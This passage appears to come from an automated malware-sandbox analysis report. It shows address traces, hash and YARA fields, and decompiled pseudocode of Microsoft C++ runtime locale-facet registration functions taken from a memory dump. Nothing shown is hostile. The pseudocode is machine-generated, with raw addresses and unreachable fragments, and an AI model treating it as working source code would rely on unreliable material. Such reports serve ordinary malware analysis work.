0x0048cfd2
0x0048cfdc
0x0048cfe1
0x0048cfec
0x0048cff0
0x0048d001
0x0048d003
0x0048d005
0x0048d04a
0x0048d04d
0x0048d059
0x0048d007
0x0048d007
0x0048d009
0x0048d00f
0x0048d015
0x0048d016
0x0048d01c
0x0048d01d
0x0048d020
0x0048d05a
0x0048d05f
0x0048d063
0x0048d067
0x0048d06b
0x0048d06b
0x0048d06b
0x0048d06f
0x0048d076
0x0048d079
0x0048d082
0x0048d022
0x0048d022
0x0048d025
0x0048d029
0x0048d02d
0x0048d03a
0x0048d042
0x0048d044
0x00000000
0x0048d044
0x0048d00b
0x0048d00b
0x00000000
0x0048d00b
0x0048d009
0x0048cf8d
0x0048cf8d
0x0048cf90
0x0048cf94
0x0048cf98
0x0048cfa5
0x0048cfad
0x0048cfaf
0x00000000
0x0048cfaf
0x0048cf76
0x0048cf76
0x00000000
0x0048cf76
0x0048cf74
0x0048cef8
0x0048cef8
0x0048cefb
0x0048ceff
0x0048cf03
0x0048cf10
0x0048cf18
0x0048cf1a
0x00000000
0x0048cf1a
0x0048cee1
0x0048cee1
0x00000000
0x0048cee1
0x0048cedf
0x0048ce63
0x0048ce63
0x0048ce66
0x0048ce6a
0x0048ce6e
0x0048ce7b
0x0048ce83
0x0048ce85
0x00000000
0x0048ce85
0x0048ce4c
0x0048ce4c
0x00000000
0x0048ce4c
0x0048ce4a
0x0048cdce
0x0048cdce
0x0048cdd1
0x0048cdd5
0x0048cdd9
0x0048cde6
0x0048cdee
0x0048cdf0
0x00000000
0x0048cdf0
0x0048cdb7
0x0048cdb7
0x00000000
0x0048cdb7
0x0048cdb5
0x0048cd39
0x0048cd39
0x0048cd3c
0x0048cd40
0x0048cd44
0x0048cd51
0x0048cd59
0x0048cd5b
0x00000000
0x0048cd5b
0x0048cd22
0x0048cd22
0x00000000
0x0048cd22
0x0048cd20
0x0048cca4
0x0048cca4
0x0048cca7
0x0048ccab
0x0048ccaf
0x0048ccbc
0x0048ccc4
0x0048ccc6
0x00000000
0x0048ccc6
0x0048cc8d
0x0048cc8d
0x00000000
0x0048cc8d
0x0048cc8b
0x0048cc0f
0x0048cc0f
0x0048cc12
0x0048cc16
0x0048cc1a
0x0048cc27
0x0048cc2f
0x0048cc31
0x00000000
0x0048cc31
0x0048cbf8
0x0048cbf8
0x00000000
0x0048cbf8
0x0048cbf6
0x0048cb7a
0x0048cb7a
0x0048cb7d
0x0048cb81
0x0048cb85
0x0048cb92
0x0048cb9a
0x0048cb9c
0x00000000
0x0048cb9c
0x0048cb63
0x0048cb63
0x00000000
0x0048cb63
0x0048cb61
0x0048cae5
0x0048cae5
0x0048cae8
0x0048caec
0x0048caf0
0x0048cafd
0x0048cb05
0x0048cb07
0x00000000
0x0048cb07
0x0048cace
0x0048cace
0x00000000
0x0048cace
0x0048cacc
0x0048ca50
0x0048ca50
0x0048ca53
0x0048ca57
0x0048ca5b
0x0048ca68
0x0048ca70
0x0048ca72
0x00000000
0x0048ca72
0x0048ca39
0x0048ca39
0x00000000
0x0048ca39
0x0048ca37
0x0048c9bb
0x0048c9bb
0x0048c9be
0x0048c9c2
0x0048c9c6
0x0048c9d3
0x0048c9db
0x0048c9dd
0x00000000
0x0048c9dd
0x0048c9a4
0x0048c9a4
0x00000000
0x0048c9a4
0x0048c9a2
0x0048c926
0x0048c926
0x0048c929
0x0048c92d
0x0048c931
0x0048c93e
0x0048c946
0x0048c948
0x00000000
0x0048c948
0x0048c90f
0x0048c90f
0x00000000
0x0048c90f
0x0048c90d
0x0048c891
0x0048c891
0x0048c894
0x0048c898
0x0048c89c
0x0048c8a9
0x0048c8b1
0x0048c8b3
0x00000000
0x0048c8b3
0x0048c87a
0x0048c87a
0x00000000
0x0048c87a
0x0048c878
0x0048c7fc
0x0048c7fc
0x0048c7ff
0x0048c803
0x0048c807
0x0048c814
0x0048c81c
0x0048c81e
0x00000000
0x0048c81e
0x0048c7e5
0x0048c7e5
0x00000000
0x0048c7e5
0x0048c7e3
0x0048c767
0x0048c767
0x0048c76a
0x0048c76e
0x0048c772
0x0048c77f
0x0048c787
0x0048c789
0x00000000
0x0048c789
0x0048c750
0x0048c750
0x00000000
0x0048c750
0x0048c74e
0x0048c6d2
0x0048c6d2
0x0048c6d5
0x0048c6d9
0x0048c6dd
0x0048c6ea
0x0048c6f2
0x0048c6f4
0x00000000
0x0048c6f4
0x0048c6bb
0x0048c6bb
0x00000000
0x0048c6bb
0x0048c6b9
0x0048c63d
0x0048c63d
0x0048c640
0x0048c644
0x0048c648
0x0048c655
0x0048c65d
0x0048c65f
0x00000000
0x0048c65f
0x0048c626
0x0048c626
0x00000000
0x0048c626
0x0048c624
0x0048c5a8
0x0048c5a8
0x0048c5ab
0x0048c5af
0x0048c5b3
0x0048c5c0
0x0048c5c8
0x0048c5ca
0x00000000
0x0048c5ca
0x0048c591
0x0048c591
0x00000000
0x0048c591
0x0048c58f

APIs

__EH_prolog3.LIBCMT ref: 0048C558
std::_Lockit::_Lockit.LIBCPMT ref: 0048C562

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

messages.LIBCPMT ref: 0048C59C
std::_Facet_Register.LIBCPMT ref: 0048C5B3
std::_Lockit::~_Lockit.LIBCPMT ref: 0048C5D3
Concurrency::cancel_current_task.LIBCPMT ref: 0048C5E0

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Registermessages
String ID:
API String ID: 37379925-0
Opcode ID: 4bc7748a17087faf90baa822c35de2aba4e76ee606fdce50e0855399620bb9bb
Instruction ID: 9d515936320b941d598714f015e3cc2c31834eb0b91ffd1c19c5b4e0f3fbe4cd
Opcode Fuzzy Hash: 4bc7748a17087faf90baa822c35de2aba4e76ee606fdce50e0855399620bb9bb
Instruction Fuzzy Hash: 6601AD35D002299BCB06FB65A855ABE7761AF84318F54085FE810AB382DF3CAE01C799

Uniqueness

Uniqueness Score: -1.00%

Function 00499534, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0049953B
std::_Lockit::_Lockit.LIBCPMT ref: 00499545

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

collate.LIBCPMT ref: 0049957F
std::_Facet_Register.LIBCPMT ref: 00499596
std::_Lockit::~_Lockit.LIBCPMT ref: 004995B6
Concurrency::cancel_current_task.LIBCPMT ref: 004995C3

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Registercollate
String ID:
API String ID: 573010341-0
Opcode ID: f82b6f439aee6047e612ff253070418a7a38260c1059cc480e19e83f1f739492
Instruction ID: 8868ca4e9954f45b68f8ba55d50606d717014da002e3341c1927eaae5c20bcda
Opcode Fuzzy Hash: f82b6f439aee6047e612ff253070418a7a38260c1059cc480e19e83f1f739492
Instruction Fuzzy Hash: A201A132D005159BCF06EB69D8596BE7B61AF80724F55081FE4116B392CF789E01C799

Uniqueness

Uniqueness Score: -1.00%

Function 004995C9, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E004995C9() {
				signed int _t95;
				void* _t166;
				signed int _t243;
				void* _t265;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				void* _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				signed int _t281;
				void* _t289;
				void* _t290;

				_push(8);
				L0049D90B(0x4d6966, _t265, _t273);
				L00488DEA(_t289 - 0x14, 0);
				_t274 =  *0x4ede54; // 0x0
				 *(_t289 - 4) =  *(_t289 - 4) & 0x00000000;
				 *(_t289 - 0x10) = _t274;
				_t95 = E0042B315( *((intOrPtr*)(_t289 + 8)), E0042B22E(0x4ede34, _t265, _t274, _t290));
				_t266 = _t95;
				if(_t95 != 0) {
					L5:
					L00488E42(_t289 - 0x14);
					return L0049D8D4(_t266);
				} else {
					if(_t274 == 0) {
						_push( *((intOrPtr*)(_t289 + 8)));
						_push(_t289 - 0x10);
						__eflags = L00499B85(_t266, _t274, __eflags) - 0xffffffff;
						if(__eflags == 0) {
							E0042B042(__eflags);
							asm("int3");
							_push(8);
							L0049D90B(0x4d6966, _t266, _t274);
							L00488DEA(_t289 - 0x14, 0);
							_t275 =  *0x4ede58; // 0x0
							 *(_t289 - 4) =  *(_t289 - 4) & 0x00000000;
							 *(_t289 - 0x10) = _t275;
							_t267 = E0042B315( *((intOrPtr*)(_t289 + 8)), E0042B22E(0x4ede38, _t266, _t275, __eflags));
							__eflags = _t267;
							if(_t267 != 0) {
								L12:
								L00488E42(_t289 - 0x14);
								return L0049D8D4(_t267);
							} else {
								__eflags = _t275;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t289 + 8)));
									_push(_t289 - 0x10);
									__eflags = L00499BED(_t267, _t275, __eflags) - 0xffffffff;
									if(__eflags == 0) {
										E0042B042(__eflags);
										asm("int3");
										_push(8);
										L0049D90B(0x4d6966, _t267, _t275);
										L00488DEA(_t289 - 0x14, 0);
										_t276 =  *0x4ede5c; // 0x0
										 *(_t289 - 4) =  *(_t289 - 4) & 0x00000000;
										 *(_t289 - 0x10) = _t276;
										_t268 = E0042B315( *((intOrPtr*)(_t289 + 8)), E0042B22E(0x4ede3c, _t267, _t276, __eflags));
										__eflags = _t268;
										if(_t268 != 0) {
											L19:
											L00488E42(_t289 - 0x14);
											return L0049D8D4(_t268);
										} else {
											__eflags = _t276;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t289 + 8)));
												_push(_t289 - 0x10);
												__eflags = L00499C55(_t268, _t276, __eflags) - 0xffffffff;
												if(__eflags == 0) {
													E0042B042(__eflags);
													asm("int3");
													_push(8);
													L0049D90B(0x4d6966, _t268, _t276);
													L00488DEA(_t289 - 0x14, 0);
													_t277 =  *0x4ede64; // 0x0
													 *(_t289 - 4) =  *(_t289 - 4) & 0x00000000;
													 *(_t289 - 0x10) = _t277;
													_t269 = E0042B315( *((intOrPtr*)(_t289 + 8)), E0042B22E(0x4ede44, _t268, _t277, __eflags));
													__eflags = _t269;
													if(_t269 != 0) {
														L26:
														L00488E42(_t289 - 0x14);
														return L0049D8D4(_t269);
													} else {
														__eflags = _t277;
														if(__eflags == 0) {
															_push( *((intOrPtr*)(_t289 + 8)));
															_push(_t289 - 0x10);
															__eflags = L00499CBD(_t269, _t277, __eflags) - 0xffffffff;
															if(__eflags == 0) {
																E0042B042(__eflags);
																asm("int3");
																_push(8);
																L0049D90B(0x4d6966, _t269, _t277);
																L00488DEA(_t289 - 0x14, 0);
																_t278 =  *0x4ede60;
																 *(_t289 - 4) =  *(_t289 - 4) & 0x00000000;
																 *(_t289 - 0x10) = _t278;
																_t270 = E0042B315( *((intOrPtr*)(_t289 + 8)), E0042B22E(0x4ede40, _t269, _t278, __eflags));
																__eflags = _t270;
																if(_t270 != 0) {
																	L33:
																	L00488E42(_t289 - 0x14);
																	return L0049D8D4(_t270);
																} else {
																	__eflags = _t278;
																	if(__eflags == 0) {
																		_push( *((intOrPtr*)(_t289 + 8)));
																		_push(_t289 - 0x10);
																		__eflags = L00499D41(_t270, _t278, __eflags) - 0xffffffff;
																		if(__eflags == 0) {
																			E0042B042(__eflags);
																			asm("int3");
																			_push(8);
																			L0049D90B(0x4d6966, _t270, _t278);
																			L00488DEA(_t289 - 0x14, 0);
																			_t279 =  *0x4ede68;
																			 *(_t289 - 4) =  *(_t289 - 4) & 0x00000000;
																			 *(_t289 - 0x10) = _t279;
																			_t271 = E0042B315( *((intOrPtr*)(_t289 + 8)), E0042B22E(0x4ede48, _t270, _t279, __eflags));
																			__eflags = _t271;
																			if(_t271 != 0) {
																				L40:
																				L00488E42(_t289 - 0x14);
																				return L0049D8D4(_t271);
																			} else {
																				__eflags = _t279;
																				if(__eflags == 0) {
																					_push( *((intOrPtr*)(_t289 + 8)));
																					_push(_t289 - 0x10);
																					__eflags = L00499DC6(_t271, _t279, __eflags) - 0xffffffff;
																					if(__eflags == 0) {
																						E0042B042(__eflags);
																						asm("int3");
																						_push(8);
																						L0049D90B(0x4d6966, _t271, _t279);
																						L00488DEA(_t289 - 0x14, 0);
																						_t280 =  *0x4ede6c;
																						 *(_t289 - 4) =  *(_t289 - 4) & 0x00000000;
																						 *(_t289 - 0x10) = _t280;
																						_t272 = E0042B315( *((intOrPtr*)(_t289 + 8)), E0042B22E(0x4ede4c, _t271, _t280, __eflags));
																						__eflags = _t272;
																						if(_t272 != 0) {
																							L47:
																							L00488E42(_t289 - 0x14);
																							return L0049D8D4(_t272);
																						} else {
																							__eflags = _t280;
																							if(__eflags == 0) {
																								_push( *((intOrPtr*)(_t289 + 8)));
																								_push(_t289 - 0x10);
																								_t166 = L00499E32(_t272, _t280, __eflags);
																								_pop(_t243);
																								__eflags = _t166 - 0xffffffff;
																								if(__eflags == 0) {
																									E0042B042(__eflags);
																									asm("int3");
																									_push(4);
																									L0049D90B(0x4d6989, _t272, _t280);
																									_t281 = _t243;
																									 *(_t289 - 0x10) = _t281;
																									 *((intOrPtr*)(_t281 + 4)) =  *((intOrPtr*)(_t289 + 0xc));
																									_push( *((intOrPtr*)(_t289 + 8)));
																									_t89 = _t289 - 4;
																									 *_t89 =  *(_t289 - 4) & 0x00000000;
																									__eflags =  *_t89;
																									 *_t281 = 0x402f68; // executed
																									E0049AC63(_t243, _t272, _t281,  *_t89); // executed
																									return L0049D8D4(_t281);
																								} else {
																									_t272 =  *(_t289 - 0x10);
																									 *(_t289 - 0x10) = _t272;
																									 *(_t289 - 4) = 1;
																									E0048919D(_t272);
																									 *0x4f02b4();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t272 + 4))))();
																									 *0x4ede6c = _t272;
																									goto L47;
																								}
																							} else {
																								_t272 = _t280;
																								goto L47;
																							}
																						}
																					} else {
																						_t271 =  *(_t289 - 0x10);
																						 *(_t289 - 0x10) = _t271;
																						 *(_t289 - 4) = 1;
																						E0048919D(_t271);
																						 *0x4f02b4();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t271 + 4))))();
																						 *0x4ede68 = _t271;
																						goto L40;
																					}
																				} else {
																					_t271 = _t279;
																					goto L40;
																				}
																			}
																		} else {
																			_t270 =  *(_t289 - 0x10);
																			 *(_t289 - 0x10) = _t270;
																			 *(_t289 - 4) = 1;
																			E0048919D(_t270);
																			 *0x4f02b4();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t270 + 4))))();
																			 *0x4ede60 = _t270;
																			goto L33;
																		}
																	} else {
																		_t270 = _t278;
																		goto L33;
																	}
																}
															} else {
																_t269 =  *(_t289 - 0x10);
																 *(_t289 - 0x10) = _t269;
																 *(_t289 - 4) = 1;
																E0048919D(_t269);
																 *0x4f02b4();
																 *((intOrPtr*)( *((intOrPtr*)( *_t269 + 4))))();
																 *0x4ede64 = _t269;
																goto L26;
															}
														} else {
															_t269 = _t277;
															goto L26;
														}
													}
												} else {
													_t268 =  *(_t289 - 0x10);
													 *(_t289 - 0x10) = _t268;
													 *(_t289 - 4) = 1;
													E0048919D(_t268);
													 *0x4f02b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t268 + 4))))();
													 *0x4ede5c = _t268;
													goto L19;
												}
											} else {
												_t268 = _t276;
												goto L19;
											}
										}
									} else {
										_t267 =  *(_t289 - 0x10);
										 *(_t289 - 0x10) = _t267;
										 *(_t289 - 4) = 1;
										E0048919D(_t267);
										 *0x4f02b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t267 + 4))))();
										 *0x4ede58 = _t267;
										goto L12;
									}
								} else {
									_t267 = _t275;
									goto L12;
								}
							}
						} else {
							_t266 =  *(_t289 - 0x10);
							 *(_t289 - 0x10) = _t266;
							 *(_t289 - 4) = 1;
							E0048919D(_t266);
							 *0x4f02b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t266 + 4))))();
							 *0x4ede54 = _t266;
							goto L5;
						}
					} else {
						_t266 = _t274;
						goto L5;
					}
				}
			}

0x004995c9
0x004995d0
0x004995da
0x004995df
0x004995ea
0x004995ee
0x004995fa
0x004995ff
0x00499603
0x00499648
0x0049964b
0x00499657
0x00499605
0x00499607
0x0049960d
0x00499613
0x0049961b
0x0049961e
0x00499658
0x0049965d
0x0049965e
0x00499665
0x0049966f
0x00499674
0x0049967f
0x00499683
0x00499694
0x00499696
0x00499698
0x004996dd
0x004996e0
0x004996ec
0x0049969a
0x0049969a
0x0049969c
0x004996a2
0x004996a8
0x004996b0
0x004996b3
0x004996ed
0x004996f2
0x004996f3
0x004996fa
0x00499704
0x00499709
0x00499714
0x00499718
0x00499729
0x0049972b
0x0049972d
0x00499772
0x00499775
0x00499781
0x0049972f
0x0049972f
0x00499731
0x00499737
0x0049973d
0x00499745
0x00499748
0x00499782
0x00499787
0x00499788
0x0049978f
0x00499799
0x0049979e
0x004997a9
0x004997ad
0x004997be
0x004997c0
0x004997c2
0x00499807
0x0049980a
0x00499816
0x004997c4
0x004997c4
0x004997c6
0x004997cc
0x004997d2
0x004997da
0x004997dd
0x00499817
0x0049981c
0x0049981d
0x00499824
0x0049982e
0x00499833
0x0049983e
0x00499842
0x00499853
0x00499855
0x00499857
0x0049989c
0x0049989f
0x004998ab
0x00499859
0x00499859
0x0049985b
0x00499861
0x00499867
0x0049986f
0x00499872
0x004998ac
0x004998b1
0x004998b2
0x004998b9
0x004998c3
0x004998c8
0x004998d3
0x004998d7
0x004998e8
0x004998ea
0x004998ec
0x00499931
0x00499934
0x00499940
0x004998ee
0x004998ee
0x004998f0
0x004998f6
0x004998fc
0x00499904
0x00499907
0x00499941
0x00499946
0x00499947
0x0049994e
0x00499958
0x0049995d
0x00499968
0x0049996c
0x0049997d
0x0049997f
0x00499981
0x004999c6
0x004999c9
0x004999d5
0x00499983
0x00499983
0x00499985
0x0049998b
0x00499991
0x00499992
0x00499998
0x00499999
0x0049999c
0x004999d6
0x004999db
0x004999dc
0x004999e3
0x004999e8
0x004999ea
0x004999f0
0x004999f3
0x004999f6
0x004999f6
0x004999f6
0x004999fa
0x00499a00
0x00499a0c
0x0049999e
0x0049999e
0x004999a1
0x004999a5
0x004999a9
0x004999b6
0x004999be
0x004999c0
0x00000000
0x004999c0
0x00499987
0x00499987
0x00000000
0x00499987
0x00499985
0x00499909
0x00499909
0x0049990c
0x00499910
0x00499914
0x00499921
0x00499929
0x0049992b
0x00000000
0x0049992b
0x004998f2
0x004998f2
0x00000000
0x004998f2
0x004998f0
0x00499874
0x00499874
0x00499877
0x0049987b
0x0049987f
0x0049988c
0x00499894
0x00499896
0x00000000
0x00499896
0x0049985d
0x0049985d
0x00000000
0x0049985d
0x0049985b
0x004997df
0x004997df
0x004997e2
0x004997e6
0x004997ea
0x004997f7
0x004997ff
0x00499801
0x00000000
0x00499801
0x004997c8
0x004997c8
0x00000000
0x004997c8
0x004997c6
0x0049974a
0x0049974a
0x0049974d
0x00499751
0x00499755
0x00499762
0x0049976a
0x0049976c
0x00000000
0x0049976c
0x00499733
0x00499733
0x00000000
0x00499733
0x00499731
0x004996b5
0x004996b5
0x004996b8
0x004996bc
0x004996c0
0x004996cd
0x004996d5
0x004996d7
0x00000000
0x004996d7
0x0049969e
0x0049969e
0x00000000
0x0049969e
0x0049969c
0x00499620
0x00499620
0x00499623
0x00499627
0x0049962b
0x00499638
0x00499640
0x00499642
0x00000000
0x00499642
0x00499609
0x00499609
0x00000000
0x00499609
0x00499607

APIs

__EH_prolog3.LIBCMT ref: 004995D0
std::_Lockit::_Lockit.LIBCPMT ref: 004995DA

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

messages.LIBCPMT ref: 00499614
std::_Facet_Register.LIBCPMT ref: 0049962B
std::_Lockit::~_Lockit.LIBCPMT ref: 0049964B
Concurrency::cancel_current_task.LIBCPMT ref: 00499658

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Registermessages
String ID:
API String ID: 37379925-0
Opcode ID: 581d3b7ff8c192ed1fc2a9a2d958f71696b65fa7f81e5df07151ae66b5f6ecc1
Instruction ID: d8b281b4b2f7af1f1bcc60401041b036efa8871ecac6a29e2b142880d4d86f08
Opcode Fuzzy Hash: 581d3b7ff8c192ed1fc2a9a2d958f71696b65fa7f81e5df07151ae66b5f6ecc1
Instruction Fuzzy Hash: F401AD31D002159BCF05EBA998596BE7BB1AF94714F54046EE420AB382CF7C9E01C799

Uniqueness

Uniqueness Score: -1.00%

Function 00499788, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00499788() {
				signed int _t59;
				void* _t97;
				signed int _t144;
				void* _t157;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				void* _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				void* _t172;
				void* _t173;

				_push(8);
				L0049D90B(0x4d6966, _t157, _t162);
				L00488DEA(_t172 - 0x14, 0);
				_t163 =  *0x4ede64; // 0x0
				 *(_t172 - 4) =  *(_t172 - 4) & 0x00000000;
				 *(_t172 - 0x10) = _t163;
				_t59 = E0042B315( *((intOrPtr*)(_t172 + 8)), E0042B22E(0x4ede44, _t157, _t163, _t173));
				_t158 = _t59;
				if(_t59 != 0) {
					L5:
					L00488E42(_t172 - 0x14);
					return L0049D8D4(_t158);
				} else {
					if(_t163 == 0) {
						_push( *((intOrPtr*)(_t172 + 8)));
						_push(_t172 - 0x10);
						__eflags = L00499CBD(_t158, _t163, __eflags) - 0xffffffff;
						if(__eflags == 0) {
							E0042B042(__eflags);
							asm("int3");
							_push(8);
							L0049D90B(0x4d6966, _t158, _t163);
							L00488DEA(_t172 - 0x14, 0);
							_t164 =  *0x4ede60;
							 *(_t172 - 4) =  *(_t172 - 4) & 0x00000000;
							 *(_t172 - 0x10) = _t164;
							_t159 = E0042B315( *((intOrPtr*)(_t172 + 8)), E0042B22E(0x4ede40, _t158, _t164, __eflags));
							__eflags = _t159;
							if(_t159 != 0) {
								L12:
								L00488E42(_t172 - 0x14);
								return L0049D8D4(_t159);
							} else {
								__eflags = _t164;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t172 + 8)));
									_push(_t172 - 0x10);
									__eflags = L00499D41(_t159, _t164, __eflags) - 0xffffffff;
									if(__eflags == 0) {
										E0042B042(__eflags);
										asm("int3");
										_push(8);
										L0049D90B(0x4d6966, _t159, _t164);
										L00488DEA(_t172 - 0x14, 0);
										_t165 =  *0x4ede68;
										 *(_t172 - 4) =  *(_t172 - 4) & 0x00000000;
										 *(_t172 - 0x10) = _t165;
										_t160 = E0042B315( *((intOrPtr*)(_t172 + 8)), E0042B22E(0x4ede48, _t159, _t165, __eflags));
										__eflags = _t160;
										if(_t160 != 0) {
											L19:
											L00488E42(_t172 - 0x14);
											return L0049D8D4(_t160);
										} else {
											__eflags = _t165;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t172 + 8)));
												_push(_t172 - 0x10);
												__eflags = L00499DC6(_t160, _t165, __eflags) - 0xffffffff;
												if(__eflags == 0) {
													E0042B042(__eflags);
													asm("int3");
													_push(8);
													L0049D90B(0x4d6966, _t160, _t165);
													L00488DEA(_t172 - 0x14, 0);
													_t166 =  *0x4ede6c;
													 *(_t172 - 4) =  *(_t172 - 4) & 0x00000000;
													 *(_t172 - 0x10) = _t166;
													_t161 = E0042B315( *((intOrPtr*)(_t172 + 8)), E0042B22E(0x4ede4c, _t160, _t166, __eflags));
													__eflags = _t161;
													if(_t161 != 0) {
														L26:
														L00488E42(_t172 - 0x14);
														return L0049D8D4(_t161);
													} else {
														__eflags = _t166;
														if(__eflags == 0) {
															_push( *((intOrPtr*)(_t172 + 8)));
															_push(_t172 - 0x10);
															_t97 = L00499E32(_t161, _t166, __eflags);
															_pop(_t144);
															__eflags = _t97 - 0xffffffff;
															if(__eflags == 0) {
																E0042B042(__eflags);
																asm("int3");
																_push(4);
																L0049D90B(0x4d6989, _t161, _t166);
																_t167 = _t144;
																 *(_t172 - 0x10) = _t167;
																 *((intOrPtr*)(_t167 + 4)) =  *((intOrPtr*)(_t172 + 0xc));
																_push( *((intOrPtr*)(_t172 + 8)));
																_t53 = _t172 - 4;
																 *_t53 =  *(_t172 - 4) & 0x00000000;
																__eflags =  *_t53;
																 *_t167 = 0x402f68; // executed
																E0049AC63(_t144, _t161, _t167,  *_t53); // executed
																return L0049D8D4(_t167);
															} else {
																_t161 =  *(_t172 - 0x10);
																 *(_t172 - 0x10) = _t161;
																 *(_t172 - 4) = 1;
																E0048919D(_t161);
																 *0x4f02b4();
																 *((intOrPtr*)( *((intOrPtr*)( *_t161 + 4))))();
																 *0x4ede6c = _t161;
																goto L26;
															}
														} else {
															_t161 = _t166;
															goto L26;
														}
													}
												} else {
													_t160 =  *(_t172 - 0x10);
													 *(_t172 - 0x10) = _t160;
													 *(_t172 - 4) = 1;
													E0048919D(_t160);
													 *0x4f02b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t160 + 4))))();
													 *0x4ede68 = _t160;
													goto L19;
												}
											} else {
												_t160 = _t165;
												goto L19;
											}
										}
									} else {
										_t159 =  *(_t172 - 0x10);
										 *(_t172 - 0x10) = _t159;
										 *(_t172 - 4) = 1;
										E0048919D(_t159);
										 *0x4f02b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t159 + 4))))();
										 *0x4ede60 = _t159;
										goto L12;
									}
								} else {
									_t159 = _t164;
									goto L12;
								}
							}
						} else {
							_t158 =  *(_t172 - 0x10);
							 *(_t172 - 0x10) = _t158;
							 *(_t172 - 4) = 1;
							E0048919D(_t158);
							 *0x4f02b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t158 + 4))))();
							 *0x4ede64 = _t158;
							goto L5;
						}
					} else {
						_t158 = _t163;
						goto L5;
					}
				}
			}

0x00499788
0x0049978f
0x00499799
0x0049979e
0x004997a9
0x004997ad
0x004997b9
0x004997be
0x004997c2
0x00499807
0x0049980a
0x00499816
0x004997c4
0x004997c6
0x004997cc
0x004997d2
0x004997da
0x004997dd
0x00499817
0x0049981c
0x0049981d
0x00499824
0x0049982e
0x00499833
0x0049983e
0x00499842
0x00499853
0x00499855
0x00499857
0x0049989c
0x0049989f
0x004998ab
0x00499859
0x00499859
0x0049985b
0x00499861
0x00499867
0x0049986f
0x00499872
0x004998ac
0x004998b1
0x004998b2
0x004998b9
0x004998c3
0x004998c8
0x004998d3
0x004998d7
0x004998e8
0x004998ea
0x004998ec
0x00499931
0x00499934
0x00499940
0x004998ee
0x004998ee
0x004998f0
0x004998f6
0x004998fc
0x00499904
0x00499907
0x00499941
0x00499946
0x00499947
0x0049994e
0x00499958
0x0049995d
0x00499968
0x0049996c
0x0049997d
0x0049997f
0x00499981
0x004999c6
0x004999c9
0x004999d5
0x00499983
0x00499983
0x00499985
0x0049998b
0x00499991
0x00499992
0x00499998
0x00499999
0x0049999c
0x004999d6
0x004999db
0x004999dc
0x004999e3
0x004999e8
0x004999ea
0x004999f0
0x004999f3
0x004999f6
0x004999f6
0x004999f6
0x004999fa
0x00499a00
0x00499a0c
0x0049999e
0x0049999e
0x004999a1
0x004999a5
0x004999a9
0x004999b6
0x004999be
0x004999c0
0x00000000
0x004999c0
0x00499987
0x00499987
0x00000000
0x00499987
0x00499985
0x00499909
0x00499909
0x0049990c
0x00499910
0x00499914
0x00499921
0x00499929
0x0049992b
0x00000000
0x0049992b
0x004998f2
0x004998f2
0x00000000
0x004998f2
0x004998f0
0x00499874
0x00499874
0x00499877
0x0049987b
0x0049987f
0x0049988c
0x00499894
0x00499896
0x00000000
0x00499896
0x0049985d
0x0049985d
0x00000000
0x0049985d
0x0049985b
0x004997df
0x004997df
0x004997e2
0x004997e6
0x004997ea
0x004997f7
0x004997ff
0x00499801
0x00000000
0x00499801
0x004997c8
0x004997c8
0x00000000
0x004997c8
0x004997c6

APIs

__EH_prolog3.LIBCMT ref: 0049978F
std::_Lockit::_Lockit.LIBCPMT ref: 00499799

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

moneypunct.LIBCPMT ref: 004997D3
